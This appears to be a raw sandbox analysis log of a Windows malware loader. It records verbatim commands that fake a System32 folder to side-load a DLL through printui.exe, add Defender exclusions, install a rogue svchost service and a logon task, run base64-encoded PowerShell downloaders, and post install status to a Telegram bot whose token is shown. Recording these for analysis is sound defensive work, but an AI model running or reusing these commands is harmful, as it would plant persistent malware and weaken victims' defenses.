          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c mkdir "\\?\C:\Windows \System32"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c move /y C:\Users\Public\pyld.dll "C:\Windows \System32\printui.dll"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe" Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x590769 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x590769\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x590769.dat" /f Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start x590769Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@123716: Installed success.'});"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 14 /nobreak
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 16 /nobreak
          Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -command "$decoded = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('jgnvdw50zxigpsawow0kjhb5bfbhdgggpsaiqzpcvxnlcnncuhvibgljxhb5bgquzgxsijsncmzvciaoozspew0kcwlmicgky291bnrlciatbgugmyl7dqojcshozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50ks5eb3dubg9hzezpbguoimh0dhbzoi8vz2l0ahvilmnvbs91bnzkmdevdw52bwfpbi9yyxcvbwfpbi91bjivym90chjudc5kyxqilcakchlsugf0ack7dqojfq0kcwvsc2v7dqojcshozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50ks5eb3dubg9hzezpbguoimh0dha6ly91bnzkd2wuy29tl3vumi9ib3rwcm50lmrhdcisicrwewxqyxroktsncgl9dqoju3rhcnqtu2xlzxaglvnly29uzhmgmjsncglpziaovgvzdc1qyxroicrwewxqyxrokxsncgkjy21kic9jig1rzglyicjcxd9cqzpcv2luzg93cybcu3lzdgvtmziiow0kcqljbwqgl2mgegnvchkgl3kgikm6xfdpbmrvd3ncu3lzdgvtmzjcchjpbnr1as5leguiicjdolxxaw5kb3dzifxtexn0zw0zmii7dqojcwntzcavyybtb3zlic95icjdolxvc2vyc1xqdwjsawncchlszc5kbgwiicjdolxxaw5kb3dzifxtexn0zw0zmlxwcmludhvplmrsbci7dqojcvn0yxj0lvnszwvwic1tzwnvbmrzidi7dqojcvn0yxj0lvbyb2nlc3mgluzpbgvqyxroicjdolxxaw5kb3dzifxtexn0zw0zmlxwcmludhvplmv4zsi7dqojcwjyzwfrow0kcx0ncgllbhnlew0kcqlbtmv0llnlcnzpy2vqb2lude1hbmfnzxjdojptzwn1cml0evbyb3rvy29sid0gw05ldc5tzwn1cml0evbyb3rvy29svhlwzv06olrsczeyow0kcqltdgfydc1tbgvlccatu2vjb25kcyaymdsjdqojfq0kcwlmicgky291bnrlciatzxegmtapew0kcqlicmvhazsncgl9dqojjgnvdw50zxirkzsncn0=')); invoke-expression $decoded;"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$decoded = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('jgnvdw50zxigpsawow0kjhb5bfbhdgggpsaiqzpcvxnlcnncuhvibgljxhb5bgquzgxsijsncmzvciaoozspew0kcwlmicgky291bnrlciatbgugmyl7dqojcshozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50ks5eb3dubg9hzezpbguoimh0dhbzoi8vz2l0ahvilmnvbs91bnzkmdevdw52bwfpbi9yyxcvbwfpbi91bjivym90chjudc5kyxqilcakchlsugf0ack7dqojfq0kcwvsc2v7dqojcshozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50ks5eb3dubg9hzezpbguoimh0dha6ly91bnzkd2wuy29tl3vumi9ib3rwcm50lmrhdcisicrwewxqyxroktsncgl9dqoju3rhcnqtu2xlzxaglvnly29uzhmgmjsncglpziaovgvzdc1qyxroicrwewxqyxrokxsncgkjy21kic9jig1rzglyicjcxd9cqzpcv2luzg93cybcu3lzdgvtmziiow0kcqljbwqgl2mgegnvchkgl3kgikm6xfdpbmrvd3ncu3lzdgvtmzjcchjpbnr1as5leguiicjdolxxaw5kb3dzifxtexn0zw0zmii7dqojcwntzcavyybtb3zlic95icjdolxvc2vyc1xqdwjsawncchlszc5kbgwiicjdolxxaw5kb3dzifxtexn0zw0zmlxwcmludhvplmrsbci7dqojcvn0yxj0lvnszwvwic1tzwnvbmrzidi7dqojcvn0yxj0lvbyb2nlc3mgluzpbgvqyxroicjdolxxaw5kb3dzifxtexn0zw0zmlxwcmludhvplmv4zsi7dqojcwjyzwfrow0kcx0ncgllbhnlew0kcqlbtmv0llnlcnzpy2vqb2lude1hbmfnzxjdojptzwn1cml0evbyb3rvy29sid0gw05ldc5tzwn1cml0evbyb3rvy29svhlwzv06olrsczeyow0kcqltdgfydc1tbgvlccatu2vjb25kcyaymdsjdqojfq0kcwlmicgky291bnrlciatzxegmtapew0kcqlicmvhazsncgl9dqojjgnvdw50zxirkzsncn0=')); invoke-expression $decoded;"
          Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -command "$decoded = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('qwrklu1wuhjlzmvyzw5jzsatrxhjbhvzaw9uugf0acaijgvudjptexn0zw1ecml2zvxxaw5kb3dzifxtexn0zw0zmii7dqpbzgqttxbqcmvmzxjlbmnlic1fegnsdxnpb25qyxroicikzw52oln5c3rlburyaxzlxfdpbmrvd3ncu3lzdgvtmziiow==')); invoke-expression $decoded;"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$decoded = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('qwrklu1wuhjlzmvyzw5jzsatrxhjbhvzaw9uugf0acaijgvudjptexn0zw1ecml2zvxxaw5kb3dzifxtexn0zw0zmii7dqpbzgqttxbqcmvmzxjlbmnlic1fegnsdxnpb25qyxroicikzw52oln5c3rlburyaxzlxfdpbmrvd3ncu3lzdgvtmziiow==')); invoke-expression $decoded;"
          Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x590769 binpath= "c:\windows\system32\svchost.exe -k dcomlaunch" type= own start= auto && reg add hklm\system\currentcontrolset\services\x590769\parameters /v servicedll /t reg_expand_sz /d "c:\windows\system32\x590769.dat" /f && sc start x590769
          Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -command "invoke-restmethod -uri 'https://api.telegram.org/bot7985593430:aaef1nr-tpqit5epqkopg8e701bartuiav0/sendmessage' -method post -contenttype 'application/json' -body (convertto-json @{chat_id='1536131459'; text='[loader] user@123716: installed success.'});"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "invoke-restmethod -uri 'https://api.telegram.org/bot7985593430:aaef1nr-tpqit5epqkopg8e701bartuiav0/sendmessage' -method post -contenttype 'application/json' -body (convertto-json @{chat_id='1536131459'; text='[loader] user@123716: installed success.'});"
          Source: C:\Users\user\Desktop\app64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -command "$decoded = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('jgnvdw50zxigpsawow0kjhb5bfbhdgggpsaiqzpcvxnlcnncuhvibgljxhb5bgquzgxsijsncmzvciaoozspew0kcwlmicgky291bnrlciatbgugmyl7dqojcshozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50ks5eb3dubg9hzezpbguoimh0dhbzoi8vz2l0ahvilmnvbs91bnzkmdevdw52bwfpbi9yyxcvbwfpbi91bjivym90chjudc5kyxqilcakchlsugf0ack7dqojfq0kcwvsc2v7dqojcshozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50ks5eb3dubg9hzezpbguoimh0dha6ly91bnzkd2wuy29tl3vumi9ib3rwcm50lmrhdcisicrwewxqyxroktsncgl9dqoju3rhcnqtu2xlzxaglvnly29uzhmgmjsncglpziaovgvzdc1qyxroicrwewxqyxrokxsncgkjy21kic9jig1rzglyicjcxd9cqzpcv2luzg93cybcu3lzdgvtmziiow0kcqljbwqgl2mgegnvchkgl3kgikm6xfdpbmrvd3ncu3lzdgvtmzjcchjpbnr1as5leguiicjdolxxaw5kb3dzifxtexn0zw0zmii7dqojcwntzcavyybtb3zlic95icjdolxvc2vyc1xqdwjsawncchlszc5kbgwiicjdolxxaw5kb3dzifxtexn0zw0zmlxwcmludhvplmrsbci7dqojcvn0yxj0lvnszwvwic1tzwnvbmrzidi7dqojcvn0yxj0lvbyb2nlc3mgluzpbgvqyxroicjdolxxaw5kb3dzifxtexn0zw0zmlxwcmludhvplmv4zsi7dqojcwjyzwfrow0kcx0ncgllbhnlew0kcqlbtmv0llnlcnzpy2vqb2lude1hbmfnzxjdojptzwn1cml0evbyb3rvy29sid0gw05ldc5tzwn1cml0evbyb3rvy29svhlwzv06olrsczeyow0kcqltdgfydc1tbgvlccatu2vjb25kcyaymdsjdqojfq0kcwlmicgky291bnrlciatzxegmtapew0kcqlicmvhazsncgl9dqojjgnvdw50zxirkzsncn0=')); invoke-expression $decoded;"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$decoded = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('jgnvdw50zxigpsawow0kjhb5bfbhdgggpsaiqzpcvxnlcnncuhvibgljxhb5bgquzgxsijsncmzvciaoozspew0kcwlmicgky291bnrlciatbgugmyl7dqojcshozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50ks5eb3dubg9hzezpbguoimh0dhbzoi8vz2l0ahvilmnvbs91bnzkmdevdw52bwfpbi9yyxcvbwfpbi91bjivym90chjudc5kyxqilcakchlsugf0ack7dqojfq0kcwvsc2v7dqojcshozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50ks5eb3dubg9hzezpbguoimh0dha6ly91bnzkd2wuy29tl3vumi9ib3rwcm50lmrhdcisicrwewxqyxroktsncgl9dqoju3rhcnqtu2xlzxaglvnly29uzhmgmjsncglpziaovgvzdc1qyxroicrwewxqyxrokxsncgkjy21kic9jig1rzglyicjcxd9cqzpcv2luzg93cybcu3lzdgvtmziiow0kcqljbwqgl2mgegnvchkgl3kgikm6xfdpbmrvd3ncu3lzdgvtmzjcchjpbnr1as5leguiicjdolxxaw5kb3dzifxtexn0zw0zmii7dqojcwntzcavyybtb3zlic95icjdolxvc2vyc1xqdwjsawncchlszc5kbgwiicjdolxxaw5kb3dzifxtexn0zw0zmlxwcmludhvplmrsbci7dqojcvn0yxj0lvnszwvwic1tzwnvbmrzidi7dqojcvn0yxj0lvbyb2nlc3mgluzpbgvqyxroicjdolxxaw5kb3dzifxtexn0zw0zmlxwcmludhvplmv4zsi7dqojcwjyzwfrow0kcx0ncgllbhnlew0kcqlbtmv0llnlcnzpy2vqb2lude1hbmfnzxjdojptzwn1cml0evbyb3rvy29sid0gw05ldc5tzwn1cml0evbyb3rvy29svhlwzv06olrsczeyow0kcqltdgfydc1tbgvlccatu2vjb25kcyaymdsjdqojfq0kcwlmicgky291bnrlciatzxegmtapew0kcqlicmvhazsncgl9dqojjgnvdw50zxirkzsncn0=')); invoke-expression $decoded;"Jump to behavior
          Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -command "$decoded = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('qwrklu1wuhjlzmvyzw5jzsatrxhjbhvzaw9uugf0acaijgvudjptexn0zw1ecml2zvxxaw5kb3dzifxtexn0zw0zmii7dqpbzgqttxbqcmvmzxjlbmnlic1fegnsdxnpb25qyxroicikzw52oln5c3rlburyaxzlxfdpbmrvd3ncu3lzdgvtmziiow==')); invoke-expression $decoded;"Jump to behavior
          Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x590769 binpath= "c:\windows\system32\svchost.exe -k dcomlaunch" type= own start= auto && reg add hklm\system\currentcontrolset\services\x590769\parameters /v servicedll /t reg_expand_sz /d "c:\windows\system32\x590769.dat" /f && sc start x590769Jump to behavior
          Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -command "invoke-restmethod -uri 'https://api.telegram.org/bot7985593430:aaef1nr-tpqit5epqkopg8e701bartuiav0/sendmessage' -method post -contenttype 'application/json' -body (convertto-json @{chat_id='1536131459'; text='[loader] user@123716: installed success.'});"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$decoded = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('qwrklu1wuhjlzmvyzw5jzsatrxhjbhvzaw9uugf0acaijgvudjptexn0zw1ecml2zvxxaw5kb3dzifxtexn0zw0zmii7dqpbzgqttxbqcmvmzxjlbmnlic1fegnsdxnpb25qyxroicikzw52oln5c3rlburyaxzlxfdpbmrvd3ncu3lzdgvtmziiow==')); invoke-expression $decoded;"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "invoke-restmethod -uri 'https://api.telegram.org/bot7985593430:aaef1nr-tpqit5epqkopg8e701bartuiav0/sendmessage' -method post -contenttype 'application/json' -body (convertto-json @{chat_id='1536131459'; text='[loader] user@123716: installed success.'});"
          Source: C:\Windows\System32\svchost.exeCode function: strtoul,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,strncmp,28_2_682864E0
          Source: C:\Windows\System32\svchost.exeCode function: strchr,pthread_mutex_lock,strcmp,strncpy,EnumSystemLocalesA,pthread_mutex_unlock,strcpy,pthread_mutex_unlock,abort,28_2_68287D70
          Source: C:\Windows\System32\svchost.exeCode function: getenv,GetLocaleInfoA,28_2_68286680
          Source: C:\Windows\System32\svchost.exeCode function: AreFileApisANSI,EnumSystemLocalesEx,GetDateFormatEx,GetLocaleInfoEx,GetTimeFormatEx,GetUserDefaultLocaleName,IsValidLocaleName,LCMapStringEx,LCIDToLocaleName,LocaleNameToLCID,28_2_00007FF8A7FB0348
          Source: C:\Windows\System32\console_zero.exeCode function: AreFileApisANSI,EnumSystemLocalesEx,GetDateFormatEx,GetLocaleInfoEx,GetTimeFormatEx,GetUserDefaultLocaleName,IsValidLocaleName,LCMapStringEx,LCIDToLocaleName,LocaleNameToLCID,34_2_00007FF747151B38
          Source: C:\Windows\System32\console_zero.exeCode function: GetLocaleInfoEx,GetLocaleInfoW,34_2_00007FF7471517D0
          Source: C:\Windows\System32\console_zero.exeCode function: EnumSystemLocalesEx,34_2_00007FF747151700
          Source: C:\Windows\System32\console_zero.exeCode function: EnumSystemLocalesW,34_2_00007FF74715145C
          Source: C:\Windows\System32\console_zero.exeCode function: GetLocaleInfoEx,FormatMessageA,34_2_00007FF74713C254
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
